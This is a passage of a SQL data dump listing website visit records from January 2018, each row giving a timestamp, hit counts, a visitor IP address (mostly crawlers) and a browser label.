986,1,1,0,0,'54.36.148.186','other'),(197813,1515862125,1,1,0,0,'54.36.148.166','other'),(197814,1515862267,1,1,0,0,'54.36.149.44','other'),(197815,1515862388,1,1,0,0,'54.36.149.7','other'),(197816,1515862480,1,1,0,0,'54.36.148.125','other'),(197817,1515863049,1,1,0,0,'216.244.66.246','other'),(197818,1515863219,1,1,0,0,'217.69.133.227','other'),(197819,1515863666,1,1,0,0,'217.69.133.240','other'),(197820,1515863710,1,1,0,0,'91.209.11.236','other'),(197821,1515863752,1,1,0,0,'54.36.149.106','other'),(197822,1515863923,2,0,2,0,'66.249.65.158',''),(197823,1515864003,1,1,0,0,'54.163.39.19','other'),(197824,1515864427,1,1,0,0,'216.244.66.246','other'),(197825,1515864947,1,1,0,0,'54.163.39.19','other'),(197826,1515864982,1,1,0,0,'212.55.82.188','chrome'),(197827,1515865328,1,1,0,0,'54.36.148.76','other'),(197828,1515865521,1,0,1,0,'66.249.73.137',''),(197829,1515865710,1,1,0,0,'54.36.148.12','other'),(197830,1515866040,1,1,0,0,'54.36.149.16','other'),(197831,1515866320,1,1,0,0,'54.36.149.96','other'),(197832,1515866355,1,1,0,0,'54.36.148.127','other'),(197833,1515867197,1,1,0,0,'217.69.133.253','other'),(197834,1515867253,1,1,0,0,'54.36.148.83','other'),(197835,1515867338,1,1,0,0,'217.69.133.230','other'),(197836,1515867367,2,2,0,0,'192.95.31.91','chrome'),(197837,1515867504,1,1,0,0,'217.69.136.208','other'),(197838,1515867548,1,1,0,0,'54.36.148.75','other'),(197839,1515867632,1,1,0,0,'40.77.167.89','other'),(197840,1515867920,1,1,0,0,'54.36.149.65','other'),(197841,1515867981,1,1,0,0,'54.36.148.82','other'),(197842,1515868052,1,1,0,0,'54.36.148.13','other'),(197843,1515868336,1,1,0,0,'54.36.148.124','other'),(197844,1515868454,1,1,0,0,'54.36.148.95','other'),(197845,1515868519,2,2,0,0,'54.163.39.19','other'),(197846,1515868636,1,1,0,0,'40.77.167.89','other'),(197847,1515869001,1,1,0,0,'54.36.149.54','other'),(197848,1515869487,1,1,0,0,'54.36.149.89','other'),(197849,1515869569,1,0,1,0,'66.249.73.137',''),(197850,1515869909,1,1,0,0,'54.36.148.172','other'),(197851,1515870043,1,1,0,0,'54.36.148.187','other'),(197852,1515870095,1,1,0,0,'54.36.149.97','other'),(197853,1515870979,1,1,0,0,'8.29.198.25','other'),(197854,1515871015,1,1,0,0,'51.255.71.125','other'),(197855,1515871083,1,0,1,0,'66.249.73.135',''),(197856,1515871694,1,1,0,0,'217.69.136.210','other'),(197857,1515871767,2,2,0,0,'54.163.39.19','other'),(197858,1515871803,1,1,0,0,'54.36.149.4','other'),(197859,1515872201,1,1,0,0,'54.36.148.12','other'),(197860,1515872328,1,1,0,0,'54.36.148.71','other'),(197861,1515872542,1,1,0,0,'54.36.148.185','other'),(197862,1515872711,1,1,0,0,'217.69.133.69','other'),(197863,1515872983,1,1,0,0,'54.36.148.178','other'),(197864,1515873045,1,1,0,0,'217.69.133.223','other'),(197865,1515873251,2,2,0,0,'216.244.66.246','other'),(197866,1515873481,2,2,0,0,'54.163.39.19','other'),(197867,1515874052,1,1,0,0,'217.69.133.225','other'),(197868,1515874989,1,1,0,0,'54.36.148.63','other'),(197869,1515875052,1,1,0,0,'217.69.133.234','other'),(197870,1515875178,1,1,0,0,'217.69.133.244','other'),(197871,1515875252,1,0,1,0,'66.249.73.131',''),(197872,1515875335,2,2,0,0,'54.163.39.19','other'),(197873,1515876172,1,1,0,0,'54.36.149.27','other'),(197874,1515876242,1,0,1,0,'66.249.73.135',''),(197875,1515876419,1,1,0,0,'54.36.148.238','other'),(197876,1515876455,1,1,0,0,'54.36.149.87','other'),(197877,1515876557,1,1,0,0,'216.244.66.194','other'),(197878,1515876584,1,1,0,0,'91.196.178.161','chrome'),(197879,1515876692,2,2,0,0,'54.163.39.19','other'),(197880,1515876966,1,1,0,0,'66.249.73.131','chrome'),(197881,1515877066,1,1,0,0,'54.36.148.146','other'),(197882,1515877337,1,1,0,0,'157.55.39.66','other'),(197883,1515877807,1,1,0,0,'54.36.148.30','other'),(197884,1515878164,1,1,0,0,'54.36.149.5','other'),(197885,1515878228,1,1,0,0,'54.36.148.18','other'),(197886,1515878300,1,1,0,0,'217.69.136.204','other'),(197887,1515878702,1,1,0,0,'207.46.13.0','other'),(197888,1515879017,1,0,1,0,'66.249.73.135',''),(197889,1515879041,1,1,0,0,'54.36.148.74','other'),(197890,1515879422,1,1,0,0,'51.255.71.126','other'),(197891,1515879436,1,1,0,0,'54.36.148.72','other'),(197892,1515879507,1,1,0,0,'216.244.66.194','other'),(197893,1515879569,1,1,0,0,'91.196.178.132','chrome'),(197894,1515879856,1,1,0,0,'54.36.149.29','other'),(197895,1515879947,1,1,0,0,'66.249.65.156','chrome'),(197896,1515880302,1,1,0,0,'54.163.39.19','other'),(197897,1515880321,1,1,0,0,'54.36.148.117','other'),(197898,1515880955,1,1,0,0,'157.55.39.66','other'),(197899,1515881233,1,1,0,0,'51.255.71.129','other'),(197900,1515881466,1,1,0,0,'54.36.149.35','other'),(197901,1515881825,1,1,0,0,'8.29.198.27','other'),(197902,1515882318,1,1,0,0,'54.36.148.48','other'),(197903,1515882528,1,1,0,0,'54.36.149.88','other'),(197904,1515882668,1,1,0,0,'216.244.66.246','other'),(197905,1515883089,1,1,0,0,'54.36.148.107','other'),(197906,1515883121,1,1,0,0,'178.154.171.88','other'),(197907,1515883274,1,1,0,0,'54.36.148.254','other'),(197908,1515883380,1,1,0,0,'54.36.149.41','other'),(197909,1515883615,2,2,0,0,'54.163.39.19','other'),(197910,1515883675,1,0,1,0,'66.249.73.137',''),(197911,1515884170,1,1,0,0,'54.36.149.7','other'),(197912,1515884565,1,1,0,0,'157.55.39.66','other'),(197913,1515884585,2,2,0,0,'54.163.39.19','other'),(197914,1515884729,1,0,1,0,'66.249.73.137',''),(197915,1515884957,1,1,0,0,'54.36.148.47','other'),(197916,1515885243,1,1,0,0,'54.36.149.50','other'),(197917,1515885845,1,1,0,0,'54.36.149.60','other'),(197918,1515885935,1,1,0,0,'54.36.148.72','other'),(197919,1515886017,1,1,0,0,'54.36.149.25','other'),(197920,1515886855,1,1,0,0,'54.36.148.118','other'),(197921,1515886887,1,1,0,0,'54.36.148.94','other'),(197922,1515887200,1,1,0,0,'52.34.123.236','other'),(197923,1515887673,1,1,0,0,'95.220.125.242','msie'),(197924,1515887821,3,3,0,0,'54.163.39.19','other'),(197925,1515887832,1,1,0,0,'207.46.13.155','other'),(197926,1515888034,1,1,0,0,'40.77.167.89','other'),(197927,1515888542,1,1,0,0,'54.36.148.12','other'),(197928,1515888705,1,1,0,0,'54.36.148.196','other'),(197929,1515888890,1,1,0,0,'54.36.149.91','other'),(197930,1515888958,2,2,0,0,'54.163.39.19','other'),(197931,1515889672,1,1,0,0,'216.244.66.194','other'),(197932,1515890018,1,1,0,0,'141.8.142.74','other'),(197933,1515890023,2,2,0,0,'54.163.39.19','other'),(197934,1515890281,1,1,0,0,'54.36.148.56','other'),(197935,1515890520,1,1,0,0,'54.36.148.128','other'),(197936,1515891062,1,1,0,0,'54.36.148.85','other'),(197937,1515891202,1,1,0,0,'54.36.148.96','other'),(197938,1515891468,1,1,0,0,'54.36.148.41','other'),(197939,1515891479,2,2,0,0,'54.36.148.13','other'),(197940,1515891927,1,1,0,0,'54.36.149.106','other'),(197941,1515892226,1,1,0,0,'54.36.148.120','other'),(197942,1515892364,1,1,0,0,'54.36.148.105','other'),(197943,1515892666,1,1,0,0,'8.29.198.27','other'),(197944,1515892687,1,1,0,0,'54.36.149.6','other'),(197945,1515892712,1,1,0,0,'146.185.223.25','chrome'),(197946,1515892851,1,1,0,0,'54.36.148.86','other'),(197947,1515893035,1,1,0,0,'54.36.148.255','other'),(197948,1515893332,1,1,0,0,'54.36.149.104','other'),(197949,1515893538,1,1,0,0,'54.36.148.45','other'),(197950,1515893701,3,3,0,0,'54.163.39.19','other'),(197951,1515893886,1,1,0,0,'216.244.66.237','other'),(197952,1515894368,1,1,0,0,'54.36.149.48','other'),(197953,1515894972,1,1,0,0,'54.36.148.158','other'),(197954,1515895138,1,1,0,0,'217.69.133.12','other'),(197955,1515895458,1,1,0,0,'54.163.39.19','other'),(197956,1515895551,1,1,0,0,'46.119.116.151','firefox'),(197957,1515895784,1,1,0,0,'40.77.167.89','other'),(197958,1515896109,1,1,0,0,'40.77.167.151','other'),(197959,1515896365,1,1,0,0,'54.36.148.186','other'),(197960,1515896883,1,1,0,0,'54.163.39.19','other'),(197961,1515896900,1,1,0,0,'51.255.71.128','other'),(197962,1515896978,1,1,0,0,'54.36.149.19','other'),(197963,1515897100,1,1,0,0,'54.36.149.107','other'),(197964,1515897173,1,1,0,0,'54.36.148.207','other'),(197965,1515897271,1,1,0,0,'66.249.73.135','chrome'),(197966,1515897391,1,1,0,0,'54.36.148.46','other'),(197967,1515897581,2,2,0,0,'141.8.142.74','other'),(197968,1515897907,1,1,0,0,'54.36.148.10','other'),(197969,1515898301,1,1,0,0,'40.77.167.89','other'),(197970,1515898462,1,1,0,0,'54.36.149.31','other'),(197971,1515898951,1,1,0,0,'54.36.148.55','other'),(197972,1515899027,1,1,0,0,'217.69.133.236','other'),(197973,1515899058,1,1,0,0,'54.36.148.252','other'),(197974,1515899121,1,1,0,0,'54.36.148.15','other'),(197975,1515899486,1,1,0,0,'217.69.133.28','other'),(197976,1515899782,1,1,0,0,'54.36.148.87','other'),(197977,1515900398,1,1,0,0,'54.36.148.21','other'),(197978,1515900535,1,0,1,0,'66.249.64.29',''),(197979,1515900552,1,1,0,0,'54.36.149.64','other'),(197980,1515900603,1,1,0,0,'54.36.148.185','other'),(197981,1515900734,1,1,0,0,'54.36.148.104','other'),(197982,1515901201,1,1,0,0,'54.36.148.128','other'),(197983,1515901850,1,1,0,0,'54.36.149.45','other'),(197984,1515901908,1,0,1,0,'66.249.64.28',''),(197985,1515901943,1,1,0,0,'54.36.148.150','other'),(197986,1515902036,1,1,0,0,'216.244.66.237','other'),(197987,1515902047,1,1,0,0,'54.36.149.88','other'),(197988,1515902243,1,0,1,0,'66.249.64.30',''),(197989,1515902526,1,1,0,0,'54.36.149.69','other'),(197990,1515902589,1,1,0,0,'141.8.142.74','other'),(197991,1515903509,1,1,0,0,'8.29.198.27','other'),(197992,1515903806,1,1,0,0,'54.36.148.183','other'),(197993,1515903939,1,1,0,0,'54.36.148.59','other'),(197994,1515904013,1,0,1,0,'66.249.70.25',''),(197995,1515904362,1,1,0,0,'178.154.171.88','other'),(197996,1515904468,1,1,0,0,'40.77.167.151','other'),(197997,1515904585,1,1,0,0,'54.36.148.76','other'),(197998,1515905660,1,1,0,0,'51.255.71.131','other'),(197999,1515906347,1,0,1,0,'66.249.64.28',''),(198000,1515906573,1,1,0,0,'54.36.148.75','other'),(198001,1515906653,1,1,0,0,'51.255.71.132','other'),(198002,1515906676,1,1,0,0,'54.36.148.35','other'),(198003,1515906905,1,1,0,0,'54.36.148.59','other'),(198004,1515906931,1,1,0,0,'54.163.39.19','other'),(198005,1515906967,1,1,0,0,'141.8.142.74','other'),(198006,1515907014,1,1,0,0,'54.36.148.28','other'),(198007,1515907196,1,1,0,0,'54.36.148.46','other'),(198008,1515907804,1,1,0,0,'54.36.148.45','other'),(198009,1515908253,1,0,1,0,'66.249.64.30',''),(198010,1515908273,1,1,0,0,'54.163.39.19','other'),(198011,1515909226,1,1,0,0,'54.36.148.192','other'),(198012,1515909656,1,1,0,0,'54.36.149.36','other'),(198013,1515909982,1,1,0,0,'91.209.11.236','other'),(198014,1515910052,1,1,0,0,'54.36.148.106','other'),(198015,1515910282,1,1,0,0,'54.36.149.62','other'),(198016,1515910358,1,1,0,0,'54.163.39.19','other'),(198017,1515910388,1,1,0,0,'54.36.149.47','other'),(198018,1515910554,1,1,0,0,'54.36.148.191','other'),(198019,1515911248,1,1,0,0,'54.36.149.65','other'),(198020,1515911366,1,1,0,0,'54.36.148.113','other'),(198021,1515911894,2,2,0,0,'216.244.66.246','other'),(198022,1515912574,1,1,0,0,'54.163.39.19','other'),(198023,1515914353,1,1,0,0,'8.29.198.26','other'),(198024,1515914838,1,1,0,0,'54.163.39.19','other'),(198025,1515916033,1,1,0,0,'157.55.39.138','other'),(198026,1515916277,3,3,0,0,'54.163.39.19','other'),(198027,1515916390,1,1,0,0,'52.34.123.236','firefox'),(198028,1515917211,1,1,0,0,'178.54.194.124','chrome'),(198029,1515917729,1,1,0,0,'146.185.223.5','chrome'),(198030,1515917763,1,1,0,0,'54.163.39.19','other'),(198031,1515919742,1,1,0,0,'131.253.25.252','other'),(198032,1515919763,1,1,0,0,'54.163.39.19','other'),(198033,1515921600,2,2,0,0,'54.163.39.19','other'),(198034,1515922695,1,1,0,0,'217.69.133.29','other'),(198035,1515923062,1,1,0,0,'54.163.39.19','other'),(198036,1515923233,1,1,0,0,'62.122.202.214','firefox'),(198037,1515924539,1,1,0,0,'54.163.39.19','other'),(198038,1515925202,1,1,0,0,'8.29.198.26','other'),(198039,1515925614,1,1,0,0,'217.69.133.60','other'),(198040,1515926257,1,1,0,0,'157.55.39.223','other'),(198041,1515926444,1,1,0,0,'91.212.248.180','chrome'),(198042,1515926552,2,2,0,0,'54.163.39.19','other'),(198043,1515926565,1,1,0,0,'216.244.66.194','other'),(198044,1515928162,1,0,1,0,'66.249.70.29',''),(198045,1515929287,1,1,0,0,'54.163.39.19','other'),(198046,1515929498,1,1,0,0,'207.46.13.34','other'),(198047,1515929853,1,1,0,0,'66.249.70.25','chrome'),(198048,1515930838,2,2,0,0,'54.163.39.19','other'),(198049,1515932486,1,1,0,0,'193.178.187.228','other'),(198050,1515932626,2,2,0,0,'54.163.39.19','other'),(198051,1515933689,3,3,0,0,'54.163.39.19','other'),(198052,1515934139,4,0,4,0,'66.249.70.27',''),(198053,1515934147,1,1,0,0,'93.75.8.57','firefox'),(198054,1515934975,1,0,1,0,'66.249.70.25',''),(198055,1515935019,1,1,0,0,'54.36.148.113','other'),(198056,1515935729,1,1,0,0,'157.55.39.138','other'),(198057,1515935743,1,1,0,0,'217.69.133.229','other'),(198058,1515935773,1,1,0,0,'157.55.39.223','other'),(198059,1515935836,1,1,0,0,'54.36.148.79','other'),(198060,1515935838,1,1,0,0,'54.36.148.27','other'),(198061,1515936041,1,1,0,0,'8.29.198.25','other'),(198062,1515936086,1,1,0,0,'216.244.66.194','other'),(198063,1515936285,2,2,0,0,'54.163.39.19','other'),(198064,1515936819,1,1,0,0,'217.69.133.84','other'),(198065,1515936898,1,1,0,0,'54.36.149.102','other'),(198066,1515937182,1,1,0,0,'54.36.149.71','other'),(198067,1515937749,1,1,0,0,'195.54.42.30','chrome'),(198068,1515937913,1,1,0,0,'54.36.148.231','other'),(198069,1515937973,1,1,0,0,'157.55.39.138','other'),(198070,1515938145,1,1,0,0,'54.36.148.242','other'),(198071,1515938507,1,1,0,0,'54.163.39.19','other'),(198072,1515938567,1,1,0,0,'141.8.142.74','other'),(198073,1515938594,1,1,0,0,'66.249.64.30','chrome'),(198074,1515938609,1,1,0,0,'66.249.64.29','chrome'),(198075,1515938675,1,1,0,0,'162.210.196.98','other'),(198076,1515938939,1,1,0,0,'54.36.148.191','other'),(198077,1515939141,1,1,0,0,'178.93.58.2','chrome'),(198078,1515939162,1,1,0,0,'54.36.148.147','other'),(198079,1515939436,2,2,0,0,'54.163.39.19','other'),(198080,1515940016,1,1,0,0,'54.36.148.90','other'),(198081,1515940056,1,1,0,0,'87.250.224.46','other'),(198082,1515940197,1,1,0,0,'46.219.73.70','firefox'),(198083,1515940211,1,0,1,0,'66.249.64.30',''),(198084,1515940247,1,1,0,0,'54.36.148.48','other'),(198085,1515940363,1,0,1,0,'66.249.70.27',''),(198086,1515940901,1,1,0,0,'216.244.66.246','other'),(198087,1515941115,1,1,0,0,'54.36.148.199','other'),(198088,1515941126,1,1,0,0,'141.8.142.74','other'),(198089,1515941252,1,1,0,0,'216.244.66.237','other'),(198090,1515941486,1,1,0,0,'46.201.175.154','chrome'),(198091,1515941696,1,1,0,0,'54.36.148.37','other'),(198092,1515942011,1,1,0,0,'220.181.132.177','chrome'),(198093,1515942037,1,1,0,0,'106.120.162.97','chrome'),(198094,1515942488,1,1,0,0,'217.69.136.203','other'),(198095,1515942544,1,1,0,0,'157.55.39.138','other'),(198096,1515942880,1,1,0,0,'141.8.142.74','other'),(198097,1515942941,1,1,0,0,'46.133.55.170','other'),(198098,1515943083,1,1,0,0,'54.36.149.20','other'),(198099,1515943518,1,1,0,0,'54.36.148.165','other'),(198100,1515944232,3,3,0,0,'157.55.39.223','other'),(198101,1515944426,1,1,0,0,'91.196.178.67','firefox'),(198102,1515944679,1,1,0,0,'54.36.148.113','other'),(198103,1515944732,1,1,0,0,'54.36.149.58','other'),(198104,1515945194,1,1,0,0,'54.36.148.11','other'),(198105,1515945424,1,1,0,0,'54.36.148.252','other'),(198106,1515945486,1,1,0,0,'46.211.7.76','chrome'),(198107,1515945638,1,1,0,0,'54.36.149.48','other'),(198108,1515946006,1,1,0,0,'54.36.148.137','other'),(198109,1515946334,1,1,0,0,'54.36.148.47','other'),(198110,1515946525,1,1,0,0,'54.36.148.158','other'),(198111,1515946613,1,1,0,0,'54.36.149.65','other'),(198112,1515946726,1,1,0,0,'54.36.149.103','other'),(198113,1515946775,1,1,0,0,'54.36.148.21','other'),(198114,1515946875,1,1,0,0,'54.36.148.113','other'),(198115,1515946896,1,1,0,0,'8.29.198.26','other'),(198116,1515947076,1,1,0,0,'54.36.148.96','other'),(198117,1515947245,1,1,0,0,'54.36.149.96','other'),(198118,1515947424,1,1,0,0,'54.36.148.87','other'),(198119,1515947740,1,1,0,0,'54.36.149.18','other'),(198120,1515947799,1,1,0,0,'51.255.71.114','other'),(198121,1515948306,1,1,0,0,'54.36.148.114','other'),(198122,1515949744,1,1,0,0,'216.244.66.246','other'),(198123,1515950199,1,1,0,0,'54.36.148.234','other'),(198124,1515950210,2,2,0,0,'157.55.39.218','other'),(198125,1515950323,1,1,0,0,'54.36.148.77','other'),(198126,1515950545,1,1,0,0,'54.36.148.83','other'),(198127,1515951074,1,1,0,0,'217.69.133.14','other'),(198128,1515951167,1,1,0,0,'54.36.149.104','other'),(198129,1515951216,1,1,0,0,'54.36.149.54','other'),(198130,1515951803,1,1,0,0,'217.69.133.248','other'),(198131,1515951915,1,1,0,0,'54.36.149.10','other'),(198132,1515952260,1,1,0,0,'54.36.148.207','other'),(198133,1515952297,1,1,0,0,'54.36.149.84','other'),(198134,1515952498,1,1,0,0,'54.36.149.90','other'),(198135,1515953079,1,1,0,0,'54.36.148.108','other'),(198136,1515953091,1,1,0,0,'54.36.149.96','other'),(198137,1515953183,1,1,0,0,'54.36.148.125','other'),(198138,1515953310,1,1,0,0,'54.36.148.180','other'),(198139,1515953397,1,1,0,0,'54.36.149.18','other'),(198140,1515954192,1,1,0,0,'54.36.149.40','other'),(198141,1515954283,1,1,0,0,'54.36.148.235','other'),(198142,1515954295,1,1,0,0,'207.46.13.7','other'),(198143,1515954321,1,1,0,0,'66.249.64.28','chrome'),(198144,1515954536,1,1,0,0,'54.36.148.137','other'),(198145,1515954545,1,1,0,0,'54.36.148.78','other'),(198146,1515954705,1,1,0,0,'217.69.133.67','other'),(198147,1515955550,1,1,0,0,'54.36.148.238','other'),(198148,1515955568,1,1,0,0,'54.36.149.49','other'),(198149,1515955611,1,1,0,0,'54.36.148.107','other'),(198150,1515955670,1,1,0,0,'54.36.148.86','other'),(198151,1515955681,1,1,0,0,'193.201.83.11','chrome'),(198152,1515955833,1,1,0,0,'54.36.148.105','other'),(198153,1515956015,1,1,0,0,'54.36.148.182','other'),(198154,1515956222,1,1,0,0,'207.46.13.10','other'),(198155,1515956225,1,1,0,0,'54.36.148.93','other'),(198156,1515956398,1,1,0,0,'54.36.149.27','other'),(198157,1515956533,1,1,0,0,'54.36.149.5','other'),(198158,1515956680,1,1,0,0,'54.36.148.199','other'),(198159,1515956849,1,1,0,0,'54.36.149.94','other'),(198160,1515957505,1,1,0,0,'54.36.149.55','other'),(198161,1515957586,1,1,0,0,'54.36.149.47','other'),(198162,1515957587,1,1,0,0,'54.36.148.98','other'),(198163,1515957729,1,1,0,0,'8.29.198.26','other'),(198164,1515957846,1,1,0,0,'54.36.149.82','other'),(198165,1515958210,1,0,1,0,'66.249.64.30',''),(198166,1515958891,1,1,0,0,'216.244.66.246','other'),(198167,1515959050,1,1,0,0,'54.36.149.76','other'),(198168,1515959138,1,1,0,0,'217.69.133.12','other'),(198169,1515960197,34,34,0,0,'81.92.202.205','other'),(198170,1515960203,1,1,0,0,'216.244.66.237','other'),(198171,1515960259,1,1,0,0,'54.36.148.16','other'),(198172,1515960459,1,1,0,0,'207.46.13.9','other'),(198173,1515960528,1,1,0,0,'54.36.149.21','other'),(198174,1515960536,1,1,0,0,'54.36.148.154','other'),(198175,1515961411,1,1,0,0,'66.249.70.29','chrome'),(198176,1515961935,1,1,0,0,'217.69.133.224','other'),(198177,1515962119,1,0,1,0,'66.249.64.14',''),(198178,1515962326,1,1,0,0,'54.36.148.162','other'),(198179,1515962722,1,1,0,0,'54.36.149.25','other'),(198180,1515963090,1,0,1,0,'68.180.229.104',''),(198181,1515963362,1,1,0,0,'54.36.148.137','other'),(198182,1515963592,1,1,0,0,'54.36.148.162','other'),(198183,1515963801,1,1,0,0,'54.36.149.2','other'),(198184,1515964033,1,1,0,0,'204.79.180.1','msie'),(198185,1515964123,1,1,0,0,'95.108.225.222','chrome'),(198186,1515964228,1,1,0,0,'176.195.65.207','msie'),(198187,1515964391,1,1,0,0,'141.8.142.74','other'),(198188,1515965194,1,1,0,0,'54.36.148.152','other'),(198189,1515965674,1,1,0,0,'54.36.149.73','other'),(198190,1515965701,1,1,0,0,'54.36.148.29','other'),(198191,1515966040,1,1,0,0,'54.36.148.153','other'),(198192,1515966303,1,1,0,0,'54.36.148.180','other'),(198193,1515966710,1,1,0,0,'216.244.66.194','other'),(198194,1515967050,1,1,0,0,'54.36.148.205','other'),(198195,1515967326,1,1,0,0,'54.36.149.47','other'),(198196,1515967725,1,1,0,0,'54.36.148.150','other'),(198197,1515967757,1,1,0,0,'54.36.148.197','other'),(198198,1515968027,1,1,0,0,'54.36.148.168','other'),(198199,1515968124,1,1,0,0,'216.244.66.246','other'),(198200,1515968568,1,1,0,0,'8.29.198.26','other'),(198201,1515969102,1,1,0,0,'54.36.148.241','other'),(198202,1515969380,1,1,0,0,'217.69.136.210','other'),(198203,1515969414,1,1,0,0,'207.46.13.10','other'),(198204,1515969419,1,1,0,0,'54.36.149.78','other'),(198205,1515970557,1,1,0,0,'54.36.148.186','other'),(198206,1515972145,2,2,0,0,'54.36.149.34','other'),(198207,1515972441,1,1,0,0,'54.36.148.84','other'),(198208,1515972490,1,1,0,0,'54.36.148.33','other'),(198209,1515972604,1,1,0,0,'178.154.171.88','other'),(198210,1515973251,1,1,0,0,'54.36.148.146','other'),(198211,1515973369,1,1,0,0,'54.36.148.113','other'),(198212,1515973429,1,1,0,0,'54.36.148.188','other'),(198213,1515973465,1,1,0,0,'216.244.66.194','other'),(198214,1515973473,1,1,0,0,'54.36.148.31','other'),(198215,1515973767,1,1,0,0,'54.36.149.67','other'),(198216,1515974461,1,1,0,0,'54.36.149.21','other'),(198217,1515975033,1,0,1,0,'66.249.64.30',''),(198218,1515975050,1,1,0,0,'54.36.149.84','other'),(198219,1515975795,1,1,0,0,'54.36.149.14','other'),(198220,1515976185,1,1,0,0,'54.36.148.146','other'),(198221,1515976431,1,1,0,0,'66.249.64.29','chrome'),(198222,1515976459,1,1,0,0,'66.249.64.30','chrome'),(198223,1515976483,1,1,0,0,'54.36.148.165','other'),(198224,1515976652,1,1,0,0,'54.36.148.76','other'),(198225,1515976847,1,0,1,0,'66.249.70.27',''),(198226,1515977170,1,1,0,0,'54.36.148.173','other'),(198227,1515977249,1,1,0,0,'54.36.149.92','other'),(198228,1515977555,1,1,0,0,'54.36.148.240','other'),(198229,1515978071,1,1,0,0,'54.36.148.15','other'),(198230,1515978108,1,1,0,0,'51.255.71.123','other'),(198231,1515978816,1,1,0,0,'54.36.149.19','other'),(198232,1515979137,1,1,0,0,'207.46.13.10','other'),(198233,1515979408,1,1,0,0,'8.29.198.27','other'),(198234,1515979799,1,1,0,0,'54.36.148.183','other'),(198235,1515980825,1,1,0,0,'54.36.148.119','other'),(198236,1515980893,1,1,0,0,'54.36.149.71','other'),(198237,1515981454,1,1,0,0,'54.36.148.10','other'),(198238,1515981918,1,1,0,0,'87.250.224.46','other'),(198239,1515982276,1,1,0,0,'54.36.148.231','other'),(198240,1515982445,1,1,0,0,'54.36.148.107','other'),(198241,1515982447,1,1,0,0,'216.244.66.237','other'),(198242,1515983764,1,1,0,0,'178.154.171.88','other'),(198243,1515984062,1,1,0,0,'54.36.148.229','other'),(198244,1515984138,1,1,0,0,'54.36.148.20','other'),(198245,1515984215,1,1,0,0,'54.36.148.33','other'),(198246,1515984345,1,1,0,0,'54.36.148.200','other'),(198247,1515985348,1,1,0,0,'54.36.148.70','other'),(198248,1515985913,1,1,0,0,'178.137.83.166','chrome'),(198249,1515986326,1,0,1,0,'66.249.64.29',''),(198250,1515986472,1,1,0,0,'54.36.148.126','other'),(198251,1515986805,2,2,0,0,'216.244.66.246','other'),(198252,1515987005,1,1,0,0,'54.36.148.203','other'),(198253,1515987180,1,1,0,0,'216.244.66.194','other'),(198254,1515987535,1,1,0,0,'54.36.149.41','other'),(198255,1515987701,1,1,0,0,'178.154.171.88','other'),(198256,1515988092,1,1,0,0,'207.46.13.9','other'),(198257,1515988201,1,1,0,0,'54.36.148.51','other'),(198258,1515988715,1,1,0,0,'51.255.71.113','other'),(198259,1515989504,1,1,0,0,'54.36.148.67','other'),(198260,1515990239,1,1,0,0,'8.29.198.26','other'),(198261,1515990727,1,1,0,0,'54.36.149.99','other'),(198262,1515990872,1,1,0,0,'54.36.148.93','other'),(198263,1515991105,1,1,0,0,'217.69.133.84','other'),(198264,1515991201,1,1,0,0,'54.36.148.162','other'),(198265,1515991617,1,1,0,0,'141.8.142.74','other'),(198266,1515992274,1,1,0,0,'54.36.149.86','other'),(198267,1515992630,1,0,1,0,'66.249.70.25',''),(198268,1515992765,1,1,0,0,'54.36.148.101','other'),(198269,1515993293,1,1,0,0,'54.36.148.237','other'),(198270,1515993609,1,1,0,0,'216.244.66.194','other'),(198271,1515993739,1,0,1,0,'66.249.64.28',''),(198272,1515993856,1,1,0,0,'54.36.148.192','other'),(198273,1515993862,1,1,0,0,'198.37.118.9','firefox'),(198274,1515994348,1,1,0,0,'54.36.149.105','other'),(198275,1515994544,1,1,0,0,'91.209.11.236','other'),(198276,1515995016,1,1,0,0,'54.36.148.55','other'),(198277,1515995901,1,0,1,0,'66.249.64.30',''),(198278,1515996062,2,2,0,0,'54.36.149.46','other'),(198279,1515996081,1,1,0,0,'54.36.148.61','other'),(198280,1515996496,1,1,0,0,'54.36.149.63','other'),(198281,1515996544,1,1,0,0,'54.36.148.87','other'),(198282,1515997248,1,1,0,0,'157.55.39.221','other'),(198283,1515997330,1,1,0,0,'54.36.148.31','other'),(198284,1515997448,1,1,0,0,'54.36.148.129','other'),(198285,1515997530,1,1,0,0,'141.8.142.74','other'),(198286,1515997902,1,1,0,0,'54.36.149.6','other'),(198287,1515997948,1,1,0,0,'54.36.148.152','other'),(198288,1515998089,1,1,0,0,'54.36.148.137','other'),(198289,1515998390,1,1,0,0,'51.255.71.114','other'),(198290,1515998736,1,1,0,0,'54.36.148.198','other'),(198291,1515998878,1,1,0,0,'91.196.178.66','firefox'),(198292,1515999341,1,1,0,0,'91.196.178.165','chrome'),(198293,1515999385,1,1,0,0,'91.196.178.66','chrome'),(198294,1515999619,1,1,0,0,'37.54.5.105','chrome'),(198295,1516000585,1,1,0,0,'54.36.149.17','other'),(198296,1516000957,1,1,0,0,'54.36.148.141','other'),(198297,1516001074,1,1,0,0,'8.29.198.25','other'),(198298,1516001325,1,1,0,0,'109.95.34.19','chrome'),(198299,1516001454,1,1,0,0,'207.46.13.10','other'),(198300,1516001575,1,1,0,0,'51.255.71.120','other'),(198301,1516001845,1,0,1,0,'66.249.70.29',''),(198302,1516001928,1,1,0,0,'95.132.43.118','firefox'),(198303,1516003060,1,1,0,0,'54.36.148.240','other'),(198304,1516003077,1,1,0,0,'216.244.66.237','other'),(198305,1516003233,1,1,0,0,'141.8.142.74','other'),(198306,1516003315,9,9,0,0,'92.169.146.8','other'),(198307,1516003714,1,1,0,0,'54.36.149.38','other'),(198308,1516003729,1,1,0,0,'95.133.153.31','chrome'),(198309,1516004128,1,1,0,0,'54.36.149.21','other'),(198310,1516004285,1,1,0,0,'207.46.13.10','other'),(198311,1516004369,1,1,0,0,'94.179.147.128','chrome'),(198312,1516004381,1,1,0,0,'91.196.178.66','chrome'),(198313,1516004396,1,1,0,0,'54.36.148.131','other'),(198314,1516004592,1,1,0,0,'54.36.149.81','other'),(198315,1516004619,2,2,0,0,'95.213.141.126','opera'),(198316,1516004775,1,1,0,0,'54.36.148.245','other'),(198317,1516004790,1,1,0,0,'54.36.149.78','other'),(198318,1516004827,1,1,0,0,'54.36.148.98','other'),(198319,1516005304,1,1,0,0,'54.36.148.157','other'),(198320,1516005573,1,1,0,0,'54.36.148.140','other'),(198321,1516005883,1,1,0,0,'91.196.178.66','chrome'),(198322,1516005896,1,1,0,0,'54.36.149.3','other'),(198323,1516006623,2,2,0,0,'216.244.66.246','other'),(198324,1516006648,1,1,0,0,'91.196.178.69','firefox'),(198325,1516006690,1,1,0,0,'54.36.149.0','other'),(198326,1516006842,1,1,0,0,'54.36.148.249','other'),(198327,1516006917